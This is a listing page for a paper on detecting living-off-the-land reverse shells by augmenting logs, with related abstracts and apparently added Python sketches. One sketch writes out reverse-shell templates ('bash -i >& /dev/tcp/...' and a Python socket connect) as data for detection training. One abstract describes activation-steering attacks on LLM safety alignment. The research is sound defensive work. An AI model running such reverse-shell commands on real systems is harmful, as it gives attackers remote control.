Living-off-The-Land Reverse-Shell Detection by Informed Data
Augmentation
- URL: http://arxiv.org/abs/2402.18329v1
- Date: Wed, 28 Feb 2024 13:49:23 GMT
- Title: Living-off-The-Land Reverse-Shell Detection by Informed Data
Augmentation
- Authors: Dmitrijs Trizna, Luca Demetrio, Battista Biggio, Fabio Roli
- Abstract summary: Living-off-the-land (LOTL) offensive methodologies rely on perpetration of malicious actions through chains of commands executed by legitimate applications.
LOTL techniques are well hidden inside the stream of events generated by common legitimate activities.
We propose an augmentation framework to enhance and diversify the presence of LOTL malicious activity inside legitimate logs.
- Score: 16.06998078829495
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: The living-off-the-land (LOTL) offensive methodologies rely on the
perpetration of malicious actions through chains of commands executed by
legitimate applications, identifiable exclusively by analysis of system logs.
LOTL techniques are well hidden inside the stream of events generated by common
legitimate activities; moreover, threat actors often camouflage their activity
through obfuscation, making these techniques particularly difficult to detect
without raising numerous false alarms, even with machine learning. To improve
the performance of models in such a harsh environment, we propose an augmentation framework to
enhance and diversify the presence of LOTL malicious activity inside legitimate
logs. Guided by threat intelligence, we generate a dataset by injecting attack
templates known to be employed in the wild, further enriched by malleable
patterns of legitimate activities to replicate the behavior of evasive threat
actors. We conduct an extensive ablation study to understand which models
better handle our augmented dataset, also manipulated to mimic the presence of
model-agnostic evasion and poisoning attacks. Our results suggest that
augmentation is needed to maintain high predictive capabilities, that
robustness to attacks is achieved through specific hardening techniques such as
adversarial training, and that it is possible to deploy near-real-time models
with almost zero false alarms.
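The injection idea described in the abstract can be sketched as follows. Everything here is a hypothetical illustration: the attack templates, the toy obfuscation step, and the log layout are placeholders, not the paper's actual threat-intelligence templates or pipeline.

```python
import random

# Hypothetical LOTL reverse-shell templates launched through legitimate
# binaries (placeholders only, not the paper's dataset).
ATTACK_TEMPLATES = [
    "bash -i >& /dev/tcp/{ip}/{port} 0>&1",
    "python3 -c 'import socket,os,pty; s=socket.socket(); s.connect((\"{ip}\",{port}))'",
]

def obfuscate(cmd: str) -> str:
    """Toy evasion step: pad the command with benign-looking noise."""
    return cmd + " # --help"

def augment(benign_log: list, n_attacks: int, seed: int = 0) -> list:
    """Inject labeled attack commands at random positions in a benign log,
    optionally obfuscated to mimic evasive threat actors."""
    rng = random.Random(seed)
    events = [(cmd, 0) for cmd in benign_log]  # label 0: legitimate
    for _ in range(n_attacks):
        tmpl = rng.choice(ATTACK_TEMPLATES)
        cmd = tmpl.format(ip="10.0.0.%d" % rng.randint(1, 254),
                          port=rng.randint(1024, 65535))
        if rng.random() < 0.5:  # replicate evasive behavior on some samples
            cmd = obfuscate(cmd)
        events.insert(rng.randint(0, len(events)), (cmd, 1))  # label 1: malicious
    return events

log = ["ls -la", "systemctl status sshd", "grep error /var/log/syslog"]
augmented = augment(log, n_attacks=2)
```

The benign events keep their original order; only labeled attack events are interleaved, so the augmented stream can be fed directly to a supervised detector.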
Related papers
- LTRDetector: Exploring Long-Term Relationship for Advanced Persistent Threats Detection [20.360010908574303]
Advanced Persistent Threat (APT) is challenging to detect due to prolonged duration, infrequent occurrence, and adept concealment techniques.
Existing approaches primarily concentrate on the observable traits of attack behaviors, neglecting the intricate relationships formed throughout the persistent attack lifecycle.
We present an innovative APT detection framework named LTRDetector that implements an end-to-end, holistic detection pipeline.
arXiv Detail & Related papers (2024-04-04T02:30:51Z)
- FreqFed: A Frequency Analysis-Based Approach for Mitigating Poisoning Attacks in Federated Learning [98.43475653490219]
Federated learning (FL) is susceptible to poisoning attacks.
FreqFed is a novel aggregation mechanism that transforms the model updates into the frequency domain.
We demonstrate that FreqFed can mitigate poisoning attacks effectively with a negligible impact on the utility of the aggregated model.
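The frequency-domain filtering idea can be sketched roughly as below. This is a simplified illustration, assuming an FFT and a median-distance outlier rule; FreqFed's actual mechanism may differ in every detail.

```python
import numpy as np

def freq_filter_aggregate(updates: np.ndarray, k: int) -> np.ndarray:
    """Toy frequency-domain aggregation: transform each flattened client
    update with an FFT, compare clients on their k lowest-frequency
    magnitudes, drop the client farthest from the median profile, and
    average the rest. (Sketch only, not FreqFed's exact algorithm.)"""
    spectra = np.abs(np.fft.rfft(updates, axis=1))[:, :k]
    median_profile = np.median(spectra, axis=0)
    dists = np.linalg.norm(spectra - median_profile, axis=1)
    keep = dists < dists.max()  # drop the single most anomalous client
    if not keep.any():          # all clients identical: keep everyone
        keep[:] = True
    return updates[keep].mean(axis=0)
```

With several near-identical benign updates and one large poisoned update, the poisoned client's low-frequency profile sits far from the median and is excluded before averaging.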
arXiv Detail & Related papers (2023-12-07T16:56:24Z)
- Backdoor Activation Attack: Attack Large Language Models using Activation Steering for Safety-Alignment [36.91218391728405]
This paper studies the vulnerability of Large Language Models' safety alignment.
Existing attack methods on LLMs rely on poisoned training data or the injection of malicious prompts.
Inspired by recent success in modifying model behavior through steering vectors without the need for optimization, we draw on its effectiveness in red-teaming LLMs.
Our experiment results show that activation attacks are highly effective and add little or no overhead to attack efficiency.
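The steering-vector intervention can be illustrated on a toy network. The two-layer MLP and the chosen steering direction below are hypothetical stand-ins for an LLM's hidden activations; the point is only that behavior shifts by adding a vector, with no optimization or data poisoning.

```python
import numpy as np

def mlp_forward(x, W1, W2, steer=None):
    """Tiny 2-layer MLP; optionally add a steering vector to the hidden
    activations, mimicking activation-steering attacks (toy illustration)."""
    h = np.tanh(x @ W1)
    if steer is not None:
        h = h + steer  # intervene directly on the activations
    return h @ W2

rng = np.random.default_rng(0)
W1, W2 = rng.normal(size=(4, 8)), rng.normal(size=(8, 2))
x = rng.normal(size=(1, 4))

# Steering vector pushing the hidden state toward output 1's direction;
# no gradient-based optimization or training-data access is needed.
steer = 3.0 * (W2[:, 1] / np.linalg.norm(W2[:, 1]))
base = mlp_forward(x, W1, W2)
steered = mlp_forward(x, W1, W2, steer)
```

Because the steering vector is aligned with the second output column, the steered logit for that output is guaranteed to exceed the baseline.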
arXiv Detail & Related papers (2023-11-15T23:07:40Z)
- Poisoning Network Flow Classifiers [10.055241826257083]
This paper focuses on poisoning attacks, specifically backdoor attacks, against network traffic flow classifiers.
We investigate the challenging scenario of clean-label poisoning where the adversary's capabilities are constrained to tampering only with the training data.
We describe a trigger crafting strategy that leverages model interpretability techniques to generate trigger patterns that are effective even at very low poisoning rates.
arXiv Detail & Related papers (2023-06-02T16:24:15Z)
- Enhancing Multiple Reliability Measures via Nuisance-extended Information Bottleneck [77.37409441129995]
In practical scenarios where training data is limited, many predictive signals in the data can instead stem from biases in data acquisition.
We consider an adversarial threat model under a mutual information constraint to cover a wider class of perturbations in training.
We propose an autoencoder-based training to implement the objective, as well as practical encoder designs to facilitate the proposed hybrid discriminative-generative training.
arXiv Detail & Related papers (2023-03-24T16:03:21Z)
- Data Forensics in Diffusion Models: A Systematic Analysis of Membership Privacy [62.16582309504159]
We develop a systematic analysis of membership inference attacks on diffusion models and propose novel attack methods tailored to each attack scenario.
Our approach exploits easily obtainable quantities and is highly effective, achieving near-perfect attack performance (>0.9 AUCROC) in realistic scenarios.
arXiv Detail & Related papers (2023-02-15T17:37:49Z)
- CausalAgents: A Robustness Benchmark for Motion Forecasting using Causal Relationships [8.679073301435265]
We construct a new benchmark for evaluating and improving model robustness by applying perturbations to existing data.
We use these labels to perturb the data by deleting non-causal agents from the scene.
Under non-causal perturbations, we observe a 25-38% relative change in minADE as compared to the original.
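The minADE metric behind this relative-change measurement can be computed as follows; the straight-line trajectory and the perturbed predictions below are hypothetical toy data, not the benchmark's scenes.

```python
import numpy as np

def min_ade(preds: np.ndarray, gt: np.ndarray) -> float:
    """minADE: minimum over K predicted trajectories of the mean pointwise
    Euclidean distance to the ground-truth trajectory.
    preds has shape (K, T, 2); gt has shape (T, 2)."""
    dists = np.linalg.norm(preds - gt[None], axis=-1)  # (K, T)
    return float(dists.mean(axis=1).min())

gt = np.stack([np.arange(5.0), np.zeros(5)], axis=1)  # straight-line trajectory
preds = np.stack([gt + 0.1, gt + 0.5])                # two prediction modes
base = min_ade(preds, gt)

# Hypothetical predictions after perturbing the scene (e.g. deleting
# non-causal agents): the best mode drifts slightly.
perturbed = np.stack([gt + 0.15, gt + 0.5])
rel_change = (min_ade(perturbed, gt) - base) / base
```

Here the best mode's constant offset grows from 0.1 to 0.15 per coordinate, giving exactly a 50% relative change in minADE.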
arXiv Detail & Related papers (2022-07-07T21:28:23Z)
- Zero Day Threat Detection Using Graph and Flow Based Security Telemetry [3.3029515721630855]
Zero Day Threats (ZDT) are novel methods used by malicious actors to attack and exploit information technology (IT) networks or infrastructure.
In this paper, we introduce a deep learning based approach to Zero Day Threat detection that can generalize, scale, and effectively identify threats in near real-time.
arXiv Detail & Related papers (2022-05-04T19:30:48Z)
- Policy Smoothing for Provably Robust Reinforcement Learning [109.90239627115336]
We study the provable robustness of reinforcement learning against norm-bounded adversarial perturbations of the inputs.
We generate certificates that guarantee that the total reward obtained by the smoothed policy will not fall below a certain threshold under a norm-bounded adversarial perturbation of the input.
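A smoothed policy can be illustrated with a toy discrete-action example. The threshold policy, noise scale, and vote count below are illustrative assumptions, not the paper's construction; the paper's contribution is certifying reward bounds for policies smoothed in this spirit.

```python
import numpy as np

def smoothed_action(policy, obs: np.ndarray, sigma: float, n: int,
                    seed: int = 0) -> int:
    """Randomized smoothing for a discrete two-action policy: add Gaussian
    noise to the observation n times and return the majority-vote action.
    Small input perturbations then change the vote distribution only
    gradually, which is what makes certification possible."""
    rng = np.random.default_rng(seed)
    votes = np.zeros(2, dtype=int)
    for _ in range(n):
        noisy = obs + rng.normal(scale=sigma, size=obs.shape)
        votes[policy(noisy)] += 1
    return int(votes.argmax())

# Toy threshold policy on a 1-D observation.
policy = lambda o: int(o[0] > 0.0)
a = smoothed_action(policy, np.array([0.6]), sigma=0.3, n=200)
```

For an observation well inside one decision region, the overwhelming majority of noisy votes agree, so the smoothed action matches the base policy while being stable to small input shifts.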
arXiv Detail & Related papers (2021-06-21T21:42:08Z)
- Graph Backdoor [53.70971502299977]
We present GTA, the first backdoor attack on graph neural networks (GNNs).
GTA departs from prior backdoor attacks in significant ways: it defines triggers as specific subgraphs, including both topological structures and descriptive features.
It can be instantiated for both transductive (e.g., node classification) and inductive (e.g., graph classification) tasks.
arXiv Detail & Related papers (2020-06-21T19:45:30Z)
- Adversarial vs behavioural-based defensive AI with joint, continual and active learning: automated evaluation of robustness to deception, poisoning and concept drift [62.997667081978825]
Recent advancements in Artificial Intelligence (AI) have brought new capabilities to behavioural analysis (UEBA) for cyber-security.
In this paper, we present a solution to effectively mitigate such attacks by improving the detection process and efficiently leveraging human expertise.
arXiv Detail & Related papers (2020-01-13T13:54:36Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of the information presented and is not responsible for any consequences arising from its use.